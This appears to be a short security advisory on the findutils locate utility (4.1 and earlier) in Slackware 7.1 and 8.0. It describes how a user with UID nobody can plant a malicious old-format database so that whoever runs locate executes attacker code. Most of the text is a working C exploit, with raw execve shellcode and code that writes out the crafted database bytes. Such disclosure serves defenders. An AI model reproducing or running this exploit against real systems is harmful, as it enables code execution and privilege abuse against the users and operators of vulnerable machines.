|
COMMAND /usr/bin/locate (findutils-4.1 and before) SYSTEMS AFFECTED Slackware 8.0, Slackware 7.1 PROBLEM Josh Smith, lockdown and zen-parse found following. In Slackware, and possibly other distributions, it is possible to modify the locate database if one were to obtain UID nobody. This allows locate to act as a sort of 'trojan' having anyone who executes it unknowingly execute potentially malicious code. It works by taking advantage of the fact locate accepts old format databases. LOCATEDB_OLD_ESCAPE (char 30) is followed by an offset, stored in a signed integer, for how many characters to add to the current character pointer in the path. It doesn't perform any sanity checking of the input. This exploit tells it to move the pointer back a long way, back past the beginning of the string, all the way to the GOT address for exit() which then gets the address of the shellcode added, and the program then runs out of database and executes our code. #include <stdio.h> char shellcode[] = "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" "\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80" "\xe8\xe3\xff\xff\xff/tmp/xx"; char putshell[] = "\x14\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c" "\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96"; int main(void) { int i; int z0=0; int addr=0x0804a970; int z1=0; int addr2=-626; int z2=0; int addr3=addr+6; printf("%s", &addr); printf("%s", &addr3); printf("%s",shellcode); fflush(stdout); for(i=46;i<256;i++) putchar('A'); printf("%s", putshell); fflush(stdout); putchar(0); putchar(30); printf("%s", &addr2); printf("\x82\x83"); fflush(stdout); } SOLUTION Nothing yet.